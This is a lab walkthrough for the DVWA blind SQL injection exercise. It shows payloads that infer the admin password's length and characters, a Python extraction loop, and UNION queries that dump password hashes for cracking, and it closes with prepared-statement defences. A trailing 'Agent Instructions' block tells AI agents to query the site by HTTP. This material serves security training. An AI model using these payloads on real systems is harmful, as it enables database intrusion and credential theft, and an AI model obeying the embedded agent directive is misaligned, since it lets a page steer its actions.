# SQLi Blind
What is a SQL Injection Blind?
Blind SQL injection occurs when an application is vulnerable to SQL injection, but its HTTP responses do not contain the results of the relevant SQL query or the details of any database errors.
Many techniques such as [`UNION` attacks](https://portswigger.net/web-security/sql-injection/union-attacks) are not effective with blind SQL injection vulnerabilities. This is because they rely on being able to see the results of the injected query within the application's responses. It is still possible to exploit blind SQL injection to access unauthorized data, but different techniques must be used.
{% embed url="" %}
{% endembed %}
{% hint style="info" %}
Using BurpSuite and the FoxyProxy extension is recommended.
{% endhint %}
## Low
We've an input type text that received an User ID in I by user and submit request using the Submit button:
In SQL Blind we obtain a boolean result (exist or not exist) of our query, then we need to be able to ask correctly information from DB, make script can be the best approach.
This's our request captured by Burp Suite, while here below there's a php source code:
How the same in the low level, there're not input sanitation, then we can send what we want into input type text field. In this case request will arrive to DB located into webserver, but query will be preparared using php language.
Analyzing source code, we know that mysql query is:
```sql
SELECT first_name, last_name FROM users WHERE user_id = '$id';
```
#### 1st Payload (length)
Regarding query and that our input type value is insert into $id variable, we need to do multiple question to DB regarding password length.
Then in this case, we can use following payload: `1' AND (select 'x' from users where first_name='admin' and LENGTH(password) > 31)='x' #`
```sql
SELECT first_name, last_name FROM users WHERE user_id = '1' AND (select 'x' from users where first_name='admin' and LENGTH(password) > 30)='x' #';
```
*admin password length is > 31?*
User ID exists in the DB = true.
We need to continue to ask questions for obtain a correct value.
*admin password length is > 32?*
No! Answer is wrong, then regarding last two answer, we know that admin password length has 32 characters.
Of course we can use an automated python script to do this automatically:
{% embed url="" %}
#### 2nd Payload (value)
starting with the first character, up to the last (which we know from the length we have just obtained) we must repeatedly query the DB asking whether or not the password character of the i-th position includes one of the possible alphanumeric characters.
```python
for i in range(1, password_length+1):
for c in ALPHABET:
sql_payload = f"1' AND (select substring(password, {i}, 1) from users where first_name='{username}')='{c}' #"
if sql2bool(sql_payload):
password += c
print(c, end="", flush=True) # to print in a cool way
break
```
Then, our query will be:
`1' AND (select substring(password, 1, 1) from users where first_name='admin')='5' #`
```sql
SELECT first_name, last_name FROM users WHERE user_id = '1' AND (select substring(password, 1, 1) from users where first_name='admin')='5' #';
```
Is the first character of admin password equals to 'a'?
No! again, is the first character of admin password equals to '5'?
Very good, the first character is 5, then we can continue to increment index and redo all questions until the final string will be discovered.
{% hint style="warning" %}
The input is not sanitized, so I can execute any (potentially malicious) command.
{% endhint %}
## Medium
Here, there're a select with range (1 to 5) to set User ID.
In addition to low level, in the code below there're an escape string control and query variable $ID isn't enclosed by ''.
Our request include an ID + Submit values.
But, we can modify ID value using Burp Suite repeater function:
#### 1st Payload
Remembering that $ID variable isn't enclosed by '', escape string control isn't a matter.
Then in this case, we can use following payload: `1 OR 1=1 --`
```sql
SELECT first_name, last_name FROM users WHERE user_id = 1 OR 1=1 -- ;
```
in the where condition there're a first search to user with this id '' OR a true condition, plus a comment.
#### 2nd Payload
How the low level, regarding that query selects: first\_name, last\_name field from users table, we can use [UNION](https://www.w3schools.com/sql/sql_union.asp) operator to add a new query: 1 `UNION select first_name,password from users --`
```sql
SELECT first_name, last_name FROM users WHERE user_id = 1 UNION SELECT first_name,password FROM users -- ';
```
We obtain hash of psw to eventually crack using tools such as: [Hashcat](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/hashcat) and [John The Ripper](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/john-the-ripper).
Note: Every `SELECT` statement within `UNION` must have the same number of columns.
{% hint style="warning" %}
The input is not sanitized, so I can execute any (potentially malicious) command.
{% endhint %}
## High
In this level clicking on first page, we obtain a redirect to a second page to submit effectively our Session ID:
#### 1st Payload
In this case payload is always the same of low level, but we need to add it into second page, infact we've two request (GET and POST)
However, we can use following payload: `1' OR 1=1 --`
```sql
SELECT first_name, last_name FROM users WHERE user_id = '1' OR 1=1 -- ';
```
that permit us to see all DB results:
#### 2nd Payload
How last levels, we can use [UNION](https://www.w3schools.com/sql/sql_union.asp) operator to add a new query: `' UNION select first_name,password from users --`
```sql
SELECT first_name, last_name FROM users WHERE user_id = '' UNION SELECT first_name,password FROM users -- ';
```
We obtain hash of psw to eventually crack using tools such as: [Hashcat](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/hashcat) and [John The Ripper](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/john-the-ripper).
Note: Every `SELECT` statement within `UNION` must have the same number of columns.
{% hint style="warning" %}
The input is not sanitized, so I can execute any (potentially malicious) command.
{% endhint %}
## Impossible
The best solution is to sanitize query using a prepared statement, to delineate part static and dinamic (id) of query; take a binding parameter to check if is it an integer or char; insert a control to count rows number as result; and use a [CSRF](/writeups-and-walkthroughs/dvwa/csrf.md) token.
All this permits to separate sql code with sql data/parameter insert by user.
## References
For the making of this solution the following resource were used:
*
{% content-ref url="/spaces/iS3hadq7jVFgSa8k5wRA/pages/mZTJKDwQNJa4ABUvs4kB" %}
[15 - SQL Injection](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/main-contents/15-sql-injection)
{% endcontent-ref %}
{% content-ref url="/spaces/iS3hadq7jVFgSa8k5wRA/pages/I6MO9ncyNWdf8p38GGoz" %}
[SQLMap](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/sqlmap)
{% endcontent-ref %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://dev-angelist.gitbook.io/writeups-and-walkthroughs/dvwa/sqli-blind.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.